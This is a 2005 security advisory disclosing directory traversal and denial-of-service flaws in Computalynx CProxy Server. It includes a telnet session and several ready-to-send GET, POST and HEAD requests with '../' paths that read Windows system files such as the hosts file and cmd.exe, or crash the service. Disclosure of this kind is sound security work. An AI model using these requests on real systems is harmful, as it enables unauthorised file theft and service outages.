CProxyRemote.txt

`+=========================================================================================+  
| Security Advisory: Computalynx CProxy Server Multiple Remote   
Vulnerabilities |  
+=========================================================================================+  
|   
[email protected]   
March 02, 2005 |  
+=========================================================================================+  
  
  
  
AFFECTED PRODUCTS  
  
Affected Software:  
  
- Computalynx CProxy 3.3.x for Win32  
- Computalynx CProxy 3.4.x (3.4.4 inclusive) for Win32  
  
Possibly other software versions are affected.  
  
  
  
IDENTIFIED ISSUES  
  
The following issues were found to affect the aforementioned Computalynx   
CProxy Server software:  
  
[1] Directory Traversal and Arbitrary File Access Attack  
[2] Denial-of-Service Attack  
  
  
  
BRIEF DESCRIPTION  
  
Computalynx CProxy is a Windows platform based proxy server featuring   
HTTP, Telnet, POP3, SMTP,  
FTP proxy functions, as well as Anti Virus and Content Filtering   
capabilities. Because of  
inadequate input validation, a malicious attacker can perform a   
directory traversal attack and  
thus gain access to arbitrary files located on the CProxy Server   
system. Moreover, using the  
same attack vector with especially crafted HTTP requests, it is   
possible to crash the CProxy  
service running on the remote system.  
  
  
  
DETAILED DESCRIPTION  
  
Computalynx CProxy Server is a multifunctional Windows platform based   
proxy server with multi-  
protocol support. When performing proxy functions, CProxy Server is   
vulnerable to a directory  
traversal attack. Inadequate input validation and input filtering   
allows a remote attacker to  
gain attack to arbitrary files on the Windows system upon which the   
CProxy Server software has  
been deployed. This first issue of directory traversal lies within   
the fact that the CProxy  
Server fails to filter out double dot attacks and in turn fails to   
protect arbitrary files  
from being requested and opened using the proxy service. An   
especially crafted URL allows  
allows arbitrary files to be recovered from the system. The   
retrieval of system files can  
compromise the entire system or expose the system to further avenues of   
attack. A malicious  
attacker can perform a request using the following format to gain access   
to arbitrary data:  
  
GET http://<path-to-target-directory>/<filename> HTTP/1.0<CRLF><CRLF>  
  
An attacker can gain access to a file in the WINNT directory as shown in   
the following example,  
by connecting to CProxy Server's proxy service (listening on TCP port   
8080 by default), and  
executing the following request:  
  
  
ronin[kris] ~ $ telnet 10.0.0.1 8080  
Trying 10.0.0.1...  
Connected to 10.0.0.1.  
Escape character is '^]'.  
GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0  
  
  
  
HTTP/1.0 200 OK  
Content-length: 734  
Date: Sat, 19 Feb 2005 21:09:58 GMT  
Date: Sat, 19 Feb 2005 21:09:58 GMT  
# Copyright (c) 1993-1999 Microsoft Corp.  
#  
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.  
#  
# This file contains the mappings of IP addresses to host names. Each  
# entry should be kept on an individual line. The IP address should  
# be placed in the first column followed by the corresponding host name.  
# The IP address and the host name should be separated by at least one  
# space.  
#  
# Additionally, comments (such as these) may be inserted on individual  
# lines or following the machine name denoted by a '#' symbol.  
#  
# For example:  
#  
# 102.54.94.97 rhino.acme.com # source server  
# 38.25.63.10 x.acme.com # x client host  
  
  
  
127.0.0.1 localhost  
Connection closed by foreign host.  
  
  
In conjunction with this method, other HTTP methods such as "POST" and   
"HEAD", will also lead to  
arbitrary file retrieval.  
  
When retrieving an arbitrary ASCII file using the "GET" method, causes   
the file to be displayed  
and immediately afterwards causes the CProxy Server service to crash   
with an error message  
indicating that "memory could not be read". However, when retrieving   
this same ASCII file using  
the "POST" or "HEAD" methods will cause the file contents to be   
displayed and does not crash the  
CProxy Server service, allowing an attacker to execute multiple   
requests and thus allowing  
various arbitrary files to be retrieved from the CProxy Server system.  
  
* The following request will cause the arbitrary file to be displayed:  
  
-> "POST http://../../../../../winnt/system32/drivers/etc/hosts   
HTTP/1.0"  
  
* The following request will cause the arbitrary file to be displayed   
and the CProxy Server  
service to crash:  
  
-> "GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"  
  
When attempting to retrieve an executable file using any of these HTTP   
methods ("GET","HEAD", or  
"POST"), in the aforementioned manner, will cause the contents of the   
executable file contents  
to be displayed and the CProxy Server service to crash with an error   
message that "memory could  
not be read", rendering the service unavailable, thus resulting in a   
Denial-of-Service condition.  
  
* Both of the following requests will cause the arbitrary executable's   
contents to be displayed  
and the CProxy Server service to crash:  
  
-> "GET http://../../../../../winnt/system32/cmd.exe"  
-> "POST http://../../../../../winnt/system32/cmd.exe"  
  
  
  
CHARACTERISTICS  
  
* Inadequate input validation and filtering allows an attacker to   
perform directory traversal  
attacks against the systems running Computalynx CProxy Server.  
  
* Different vectors of attack allow retrieval of arbitrary and possibly   
sensitive files from  
the system running Computalynx CProxy Server.  
  
* Use of especially crafted URL's allow attackers to render to service   
unavailable, causing a  
Denial-of-Service condition.  
  
  
  
SEVERITY  
  
Each of these two issues affecting Computalynx CProxy Server software   
can directly or indirectly  
allow partial or complete compromise of the system and/or the data   
stored on the system running  
the CProxy Server software.  
  
Moreover, the second issue regarding a Denial-of-Service attack   
against the CProxy Server  
software will directly affect any users depending on the availability of   
the functions which the  
CProxy Software performs on this system.  
  
Classification: MEDIUM to HIGH  
  
  
  
VENDOR STATUS  
  
19/Feb/2005 - Computalynx contacted regarding this issue.  
02/Mar/2005 - At present, the vendor has not replied regarding this issue.  
  
  
  
SOLUTION  
  
* Currently awaiting vendor status for a solution regarding this issue.  
  
* A mitigation strategy against attacks of this nature would be to   
ensure that remote connections  
to the CProxy Server are not authorised (i.e. through the use of   
proper firewall rules).  
  
  
  
REFERENCES  
  
[1] "Computalynx Software"  
- http://www.computalynx.com  
  
  
  
--   
Kristof Philipsen  
Security Engineer   
  
Ubizen - a Cybertrust company  
18 rue Robert Stumper  
L-2557 Luxembourg  
Luxembourg  
T: +352 26 31 05 85  
F: +352 26 31 05 86  
E-mail: [email protected]  
  
www.ubizen.com - www.cybertrust.com  
  
`